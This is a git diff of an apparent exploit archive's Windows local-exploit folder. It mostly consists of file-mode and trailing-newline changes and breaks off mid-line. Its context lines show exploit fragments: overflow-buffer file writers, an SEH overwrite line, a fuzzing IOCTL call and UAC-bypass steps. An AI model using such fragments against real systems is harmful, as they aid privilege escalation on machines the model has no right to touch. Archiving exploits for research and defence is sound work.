100644 diff --git a/platforms/windows/local/2264.htm b/platforms/windows/local/2264.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2278.cpp b/platforms/windows/local/2278.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/22835.c b/platforms/windows/local/22835.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2284.c b/platforms/windows/local/2284.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2286.cpp b/platforms/windows/local/2286.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/22870.txt b/platforms/windows/local/22870.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/22882.c b/platforms/windows/local/22882.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/22883.c b/platforms/windows/local/22883.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/22946.txt b/platforms/windows/local/22946.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/22980.asm b/platforms/windows/local/22980.asm old mode 100755 new mode 100644 diff --git a/platforms/windows/local/23037.txt b/platforms/windows/local/23037.txt old mode 100755 new mode 100644 index 40ec7697f..1dc07bec1 --- a/platforms/windows/local/23037.txt +++ b/platforms/windows/local/23037.txt @@ -17,4 +17,4 @@ ShutDownOnExit=1 StartMySQL=1 CustomParams= *Username=root* -*Password=root \ No newline at end of file +*Password=root \ No newline at end of file diff --git a/platforms/windows/local/23041.txt b/platforms/windows/local/23041.txt old mode 100755 new mode 100644 index 5adbca05f..6ca54c5a7 --- a/platforms/windows/local/23041.txt +++ b/platforms/windows/local/23041.txt @@ -8,4 +8,4 @@ It should be noted that the issue has been reported in CheckMail v1.2, however o Windows Registry key used to store passwords: -HKEY_USERS\S-1-5-21-823518204-436374069-1708537768-1004\Software\DeskSoft\CheckMail \ No newline at end of file +HKEY_USERS\S-1-5-21-823518204-436374069-1708537768-1004\Software\DeskSoft\CheckMail \ No newline at end of file diff --git a/platforms/windows/local/23096.txt b/platforms/windows/local/23096.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/23210.c b/platforms/windows/local/23210.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/23255.cpp b/platforms/windows/local/23255.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/23327.txt b/platforms/windows/local/23327.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/23511.txt b/platforms/windows/local/23511.txt old mode 100755 new mode 100644 index 6c2cf2193..66378b100 --- a/platforms/windows/local/23511.txt +++ b/platforms/windows/local/23511.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9347/info Surfnet kiosks are prone to a vulnerability that may permit kiosk users to deposit extra time into kiosk accounts. This reportedly occurs when a user attempts to authenticate to the kiosk, causing their time to be doubled for each attempt. -C:\Surfnet\WWWRoot\CMD_Existing_Account_Attempt:Login=Username:Password=Password \ No newline at end of file +C:\Surfnet\WWWRoot\CMD_Existing_Account_Attempt:Login=Username:Password=Password \ No newline at end of file diff --git a/platforms/windows/local/23739.txt b/platforms/windows/local/23739.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/23910.txt b/platforms/windows/local/23910.txt old mode 100755 new mode 100644 index f95bbfc09..be6cbf5cb --- a/platforms/windows/local/23910.txt +++ b/platforms/windows/local/23910.txt @@ -10,4 +10,4 @@ To reproduce on Window NT 4: To reproduce on Windows XP: -- Create a local printer (to file), Right click on the BackWeb icon on the systray and choose "Display Channel Status", Help, Print, Add a new printer, Start explorer from any link (like "Why driver signing is imortant" or "Windows logo program"), Start CMD.EXE. \ No newline at end of file +- Create a local printer (to file), Right click on the BackWeb icon on the systray and choose "Display Channel Status", Help, Print, Add a new printer, Start explorer from any link (like "Why driver signing is imortant" or "Windows logo program"), Start CMD.EXE. \ No newline at end of file diff --git a/platforms/windows/local/23921.c b/platforms/windows/local/23921.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/23989.c b/platforms/windows/local/23989.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24014.bat b/platforms/windows/local/24014.bat old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2412.c b/platforms/windows/local/2412.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24171.c b/platforms/windows/local/24171.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24200.txt b/platforms/windows/local/24200.txt old mode 100755 new mode 100644 index f1bcb21f9..160c7e11b --- a/platforms/windows/local/24200.txt +++ b/platforms/windows/local/24200.txt @@ -28,6 +28,4 @@ A local attacker may exploit this condition to disable the affected firewall com printf("Sent.\n"); CloseHandle(hDevice); - } - - \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/local/24207.c b/platforms/windows/local/24207.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24258.txt b/platforms/windows/local/24258.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24277.c b/platforms/windows/local/24277.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24374.c b/platforms/windows/local/24374.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24678.txt b/platforms/windows/local/24678.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24682.c b/platforms/windows/local/24682.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24753.txt b/platforms/windows/local/24753.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24754.txt b/platforms/windows/local/24754.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24863.html b/platforms/windows/local/24863.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24872.txt b/platforms/windows/local/24872.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24884.html b/platforms/windows/local/24884.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24885.html b/platforms/windows/local/24885.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/24910.txt b/platforms/windows/local/24910.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/25554.c b/platforms/windows/local/25554.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/25636.txt b/platforms/windows/local/25636.txt old mode 100755 new mode 100644 index 20dd44a43..91cba1b0e --- a/platforms/windows/local/25636.txt +++ b/platforms/windows/local/25636.txt @@ -5,4 +5,4 @@ It is reported that Positive Software H-Sphere Winbox stores user account inform As a result, user credentials could be exposed to other local users who have permissions to access the log files. C:\HSphere.NET\log\action.log -C:\HSphere.NET\log\resources.log \ No newline at end of file +C:\HSphere.NET\log\resources.log \ No newline at end of file diff --git a/platforms/windows/local/25883.txt b/platforms/windows/local/25883.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/25912.c b/platforms/windows/local/25912.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/25961.c b/platforms/windows/local/25961.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/26222.c b/platforms/windows/local/26222.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/26323.cpp b/platforms/windows/local/26323.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/26479.txt b/platforms/windows/local/26479.txt old mode 100755 new mode 100644 index 9c6ea3f77..66e28652c --- a/platforms/windows/local/26479.txt +++ b/platforms/windows/local/26479.txt @@ -67,4 +67,4 @@ window.close; </head> </html> -<<< +++ >>> \ No newline at end of file +<<< +++ >>> \ No newline at end of file diff --git a/platforms/windows/local/26752.s b/platforms/windows/local/26752.s old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2676.cpp b/platforms/windows/local/2676.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/26950.c b/platforms/windows/local/26950.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/26970.c b/platforms/windows/local/26970.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/271.c b/platforms/windows/local/271.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/272.c b/platforms/windows/local/272.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/27282.txt b/platforms/windows/local/27282.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/28084.html b/platforms/windows/local/28084.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/28085.html b/platforms/windows/local/28085.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2815.c b/platforms/windows/local/2815.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2824.c b/platforms/windows/local/2824.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2872.c b/platforms/windows/local/2872.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2873.c b/platforms/windows/local/2873.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/28763.c b/platforms/windows/local/28763.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/28764.c b/platforms/windows/local/28764.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2880.c b/platforms/windows/local/2880.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/29069.c b/platforms/windows/local/29069.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/29070.c b/platforms/windows/local/29070.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/29125.txt b/platforms/windows/local/29125.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/29213.pl b/platforms/windows/local/29213.pl index 2fa5ae8f8..40f732ad2 100755 --- a/platforms/windows/local/29213.pl +++ b/platforms/windows/local/29213.pl @@ -77,4 +77,4 @@ open(FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file [" . $file . "] created\n"; -print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file +print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file diff --git a/platforms/windows/local/29263.pl b/platforms/windows/local/29263.pl index dc2224af5..692f8d295 100755 --- a/platforms/windows/local/29263.pl +++ b/platforms/windows/local/29263.pl @@ -67,4 +67,4 @@ open(FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file created [" . $file . "]\n"; -print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file +print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file diff --git a/platforms/windows/local/29309.pl b/platforms/windows/local/29309.pl index 962d8523b..27fcb3d6c 100755 --- a/platforms/windows/local/29309.pl +++ b/platforms/windows/local/29309.pl @@ -51,4 +51,4 @@ open(FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file created [" . $file . "]\n"; -print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file +print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file diff --git a/platforms/windows/local/29374.txt b/platforms/windows/local/29374.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/29403.txt b/platforms/windows/local/29403.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/29465.txt b/platforms/windows/local/29465.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2950.c b/platforms/windows/local/2950.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/29549.pl b/platforms/windows/local/29549.pl index 4d2d37016..66c71f51a 100755 --- a/platforms/windows/local/29549.pl +++ b/platforms/windows/local/29549.pl @@ -68,4 +68,4 @@ open(FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file [" . $file . "] created\n"; -print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file +print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file diff --git a/platforms/windows/local/29594.txt b/platforms/windows/local/29594.txt old mode 100755 new mode 100644 index e33690a65..a763895b8 --- a/platforms/windows/local/29594.txt +++ b/platforms/windows/local/29594.txt @@ -92,4 +92,4 @@ open(FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file created [" . $file . "]\n"; -print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file +print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file diff --git a/platforms/windows/local/29603.txt b/platforms/windows/local/29603.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/29630.c b/platforms/windows/local/29630.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/29695.txt b/platforms/windows/local/29695.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/29777.pl b/platforms/windows/local/29777.pl index ed1acf0c9..088c5e29f 100755 --- a/platforms/windows/local/29777.pl +++ b/platforms/windows/local/29777.pl @@ -63,4 +63,4 @@ open(FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file [" . $file . "] created\n"; -print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file +print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file diff --git a/platforms/windows/local/29798.pl b/platforms/windows/local/29798.pl index 316a600f4..0b29e8169 100755 --- a/platforms/windows/local/29798.pl +++ b/platforms/windows/local/29798.pl @@ -59,4 +59,4 @@ open(FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file [" . $file . "] created\n"; -print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file +print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file diff --git a/platforms/windows/local/29799.pl b/platforms/windows/local/29799.pl index 1746e88af..0805a0507 100755 --- a/platforms/windows/local/29799.pl +++ b/platforms/windows/local/29799.pl @@ -53,4 +53,4 @@ open(FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file created [" . $file . "]\n"; -print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file +print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file diff --git a/platforms/windows/local/29881.txt b/platforms/windows/local/29881.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/30007.txt b/platforms/windows/local/30007.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/30154.pl b/platforms/windows/local/30154.pl index bcccfdef2..6e4ced3b9 100755 --- a/platforms/windows/local/30154.pl +++ b/platforms/windows/local/30154.pl @@ -95,4 +95,4 @@ open(FILE, ">$file"); print FILE $regfile; close(FILE); print "Exploit file [" . $file . "] created\n"; -print "Buffer size: " . length($buffer)/3 . "\n"; \ No newline at end of file +print "Buffer size: " . length($buffer)/3 . "\n"; \ No newline at end of file diff --git a/platforms/windows/local/30192.txt b/platforms/windows/local/30192.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3024.c b/platforms/windows/local/3024.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/30374.txt b/platforms/windows/local/30374.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/30477.txt b/platforms/windows/local/30477.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/30546.txt b/platforms/windows/local/30546.txt old mode 100755 new mode 100644 index e86268933..3c3f1479b --- a/platforms/windows/local/30546.txt +++ b/platforms/windows/local/30546.txt @@ -30,4 +30,4 @@ Other versions and software packages may also be affected. - "rootshell" ;) NOTE: traysser.exe is eScan Server Updater Service that -runs as NT AUTHORITY\SYSTEM. \ No newline at end of file +runs as NT AUTHORITY\SYSTEM. \ No newline at end of file diff --git a/platforms/windows/local/30680.txt b/platforms/windows/local/30680.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/30681.txt b/platforms/windows/local/30681.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3071.c b/platforms/windows/local/3071.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/30802.c b/platforms/windows/local/30802.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/30999.txt b/platforms/windows/local/30999.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/31036.txt b/platforms/windows/local/31036.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/31090.txt b/platforms/windows/local/31090.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/31182.txt b/platforms/windows/local/31182.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3131.c b/platforms/windows/local/3131.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/31460.txt b/platforms/windows/local/31460.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3149.cpp b/platforms/windows/local/3149.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3159.cpp b/platforms/windows/local/3159.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/31667.txt b/platforms/windows/local/31667.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/31688.pl b/platforms/windows/local/31688.pl index 2d85eac55..ffbad030b 100755 --- a/platforms/windows/local/31688.pl +++ b/platforms/windows/local/31688.pl @@ -104,4 +104,4 @@ my $xml = '<?xml version="1.0" encoding="UTF-8"?><locale name="english"><excepti $xml = $xml . $sploit; $xml = $xml . '</message></warning></image></corrupt></exception></locale>'; my $buffer = $xml; -write_file("english.xml", $buffer); \ No newline at end of file +write_file("english.xml", $buffer); \ No newline at end of file diff --git a/platforms/windows/local/3176.cpp b/platforms/windows/local/3176.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/31895.txt b/platforms/windows/local/31895.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/31930.txt b/platforms/windows/local/31930.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/32.c b/platforms/windows/local/32.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/32158.txt b/platforms/windows/local/32158.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3220.c b/platforms/windows/local/3220.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/32205.txt b/platforms/windows/local/32205.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/32590.c b/platforms/windows/local/32590.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3260.txt b/platforms/windows/local/3260.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/32771.txt b/platforms/windows/local/32771.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/32850.txt b/platforms/windows/local/32850.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/32891.txt b/platforms/windows/local/32891.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/32892.txt b/platforms/windows/local/32892.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/32893.txt b/platforms/windows/local/32893.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/33012.c b/platforms/windows/local/33012.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/33360.c b/platforms/windows/local/33360.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3342.c b/platforms/windows/local/3342.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/33426.pl b/platforms/windows/local/33426.pl index d5bf0cda7..3a9764adf 100755 --- a/platforms/windows/local/33426.pl +++ b/platforms/windows/local/33426.pl @@ -86,4 +86,4 @@ open(FILE, ">$file"); print FILE $regfile; close(FILE); print "Exploit file [" . $file . "] created\n"; -print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file +print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file diff --git a/platforms/windows/local/3349.c b/platforms/windows/local/3349.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/33593.c b/platforms/windows/local/33593.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/33961.txt b/platforms/windows/local/33961.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/34112.txt b/platforms/windows/local/34112.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3417.php b/platforms/windows/local/3417.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3429.php b/platforms/windows/local/3429.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3431.php b/platforms/windows/local/3431.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3439.php b/platforms/windows/local/3439.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/34648.txt b/platforms/windows/local/34648.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/34822.c b/platforms/windows/local/34822.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3488.php b/platforms/windows/local/3488.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/34966.txt b/platforms/windows/local/34966.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/34967.txt b/platforms/windows/local/34967.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/350.c b/platforms/windows/local/350.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35040.txt b/platforms/windows/local/35040.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35077.txt b/platforms/windows/local/35077.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/351.c b/platforms/windows/local/351.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35189.c b/platforms/windows/local/35189.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/352.c b/platforms/windows/local/352.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/353.c b/platforms/windows/local/353.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35322.txt b/platforms/windows/local/35322.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35395.txt b/platforms/windows/local/35395.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35423.txt b/platforms/windows/local/35423.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/355.c b/platforms/windows/local/355.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35590.txt b/platforms/windows/local/35590.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35661.txt b/platforms/windows/local/35661.txt old mode 100755 new mode 100644 index c03c952ae..5be527fbf --- a/platforms/windows/local/35661.txt +++ b/platforms/windows/local/35661.txt @@ -17,4 +17,4 @@ The PoC has been tested on Windows 8.1 update, both 32 bit and 64 bit versions. 1) Put the AppCompatCache.exe and Testdll.dll on disk 2) Ensure that UAC is enabled, the current user is a split-token admin and the UAC setting is the default (no prompt for specific executables). 3) Execute AppCompatCache from the command prompt with the command line "AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll". -4) If successful then the calculator should appear running as an administrator. If it doesn't work first time (and you get the ComputerDefaults program) re-run the exploit from 3, there seems to be a caching/timing issue sometimes on first run. \ No newline at end of file +4) If successful then the calculator should appear running as an administrator. If it doesn't work first time (and you get the ComputerDefaults program) re-run the exploit from 3, there seems to be a caching/timing issue sometimes on first run. \ No newline at end of file diff --git a/platforms/windows/local/3576.php b/platforms/windows/local/3576.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35811.txt b/platforms/windows/local/35811.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35821.txt b/platforms/windows/local/35821.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35850.bat b/platforms/windows/local/35850.bat old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35901.txt b/platforms/windows/local/35901.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35902.txt b/platforms/windows/local/35902.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35905.c b/platforms/windows/local/35905.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3593.c b/platforms/windows/local/3593.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35953.c b/platforms/windows/local/35953.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35962.c b/platforms/windows/local/35962.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35964.c b/platforms/windows/local/35964.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35992.c b/platforms/windows/local/35992.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35993.c b/platforms/windows/local/35993.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/35994.c b/platforms/windows/local/35994.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/36052.c b/platforms/windows/local/36052.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/36062.txt b/platforms/windows/local/36062.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3617.cpp b/platforms/windows/local/3617.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/36188.txt b/platforms/windows/local/36188.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/36189.txt b/platforms/windows/local/36189.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/36327.txt b/platforms/windows/local/36327.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/36390.txt b/platforms/windows/local/36390.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/36417.txt b/platforms/windows/local/36417.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/36424.txt b/platforms/windows/local/36424.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3647.c b/platforms/windows/local/3647.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/36476.txt b/platforms/windows/local/36476.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3648.c b/platforms/windows/local/3648.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3649.c b/platforms/windows/local/3649.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3652.c b/platforms/windows/local/3652.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3664.txt b/platforms/windows/local/3664.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/368.c b/platforms/windows/local/368.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/36826.pl b/platforms/windows/local/36826.pl index 6efc1b098..48d8a8181 100755 --- a/platforms/windows/local/36826.pl +++ b/platforms/windows/local/36826.pl @@ -39,5 +39,4 @@ my $shell = open($FILE,">$file"); print $FILE $buff.$nseh.$seh.$nop.$shell; close($FILE); -print "+++++++++++++++++++\n"; - \ No newline at end of file +print "+++++++++++++++++++\n"; \ No newline at end of file diff --git a/platforms/windows/local/36859.txt b/platforms/windows/local/36859.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3688.c b/platforms/windows/local/3688.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/36909.rb b/platforms/windows/local/36909.rb index 3b3603d7a..5b799ac21 100755 --- a/platforms/windows/local/36909.rb +++ b/platforms/windows/local/36909.rb @@ -75,5 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - \ No newline at end of file +end \ No newline at end of file diff --git a/platforms/windows/local/3692.c b/platforms/windows/local/3692.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3695.c b/platforms/windows/local/3695.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37049.txt b/platforms/windows/local/37049.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37052.c b/platforms/windows/local/37052.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37065.txt b/platforms/windows/local/37065.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37098.txt b/platforms/windows/local/37098.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37211.html b/platforms/windows/local/37211.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37212.html b/platforms/windows/local/37212.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3727.c b/platforms/windows/local/3727.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37535.txt b/platforms/windows/local/37535.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3755.c b/platforms/windows/local/3755.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3757.txt b/platforms/windows/local/3757.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37657.txt b/platforms/windows/local/37657.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37716.c b/platforms/windows/local/37716.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3772.c b/platforms/windows/local/3772.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37755.c b/platforms/windows/local/37755.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3776.c b/platforms/windows/local/3776.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37768.txt b/platforms/windows/local/37768.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3777.c b/platforms/windows/local/3777.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37780.c b/platforms/windows/local/37780.c old mode 100755 new mode 100644 index 9426a78e4..4af6d6aa3 --- a/platforms/windows/local/37780.c +++ b/platforms/windows/local/37780.c @@ -19,4 +19,4 @@ Exploiting this issue allows local attackers to execute arbitrary code with the { hijack_poc () ; return 0 ; - } \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/local/3779.c b/platforms/windows/local/3779.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37799.py b/platforms/windows/local/37799.py index c38a787e5..26e55599e 100755 --- a/platforms/windows/local/37799.py +++ b/platforms/windows/local/37799.py @@ -53,5 +53,4 @@ try: print "Evil QSE script created!\nHack'n'Roll" except: print "Can't create Evil QSE script :'(" - sys.exit(0) - \ No newline at end of file + sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/local/37925.txt b/platforms/windows/local/37925.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3793.c b/platforms/windows/local/3793.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/37964.c b/platforms/windows/local/37964.c old mode 100755 new mode 100644 index aad48f625..1dafa9096 --- a/platforms/windows/local/37964.c +++ b/platforms/windows/local/37964.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/56124/info Broadcom WIDCOMM Bluetooth is prone to a local privilege-escalation vulnerability. @@ -5,6 +6,7 @@ Broadcom WIDCOMM Bluetooth is prone to a local privilege-escalation vulnerabilit A local attacker may exploit this issue to gain escalated privileges and execute arbitrary code with kernel privileges. Failed exploit attempts may result in a denial-of-service condition. Broadcom WIDCOMM Bluetooth 5.6.0.6950 is vulnerable; other versions may also be affected. +*/ HANDLE hDevice; char *inbuff, *outbuff; @@ -37,5 +39,4 @@ HANDLE hDevice; } ioctl = 0x2A04C0; memset(inbuff, 0x41, 0x70); - DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x70, (LPVOID)outbuff, 0x70, &len, NULL); - \ No newline at end of file + DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x70, (LPVOID)outbuff, 0x70, &len, NULL); \ No newline at end of file diff --git a/platforms/windows/local/3797.c 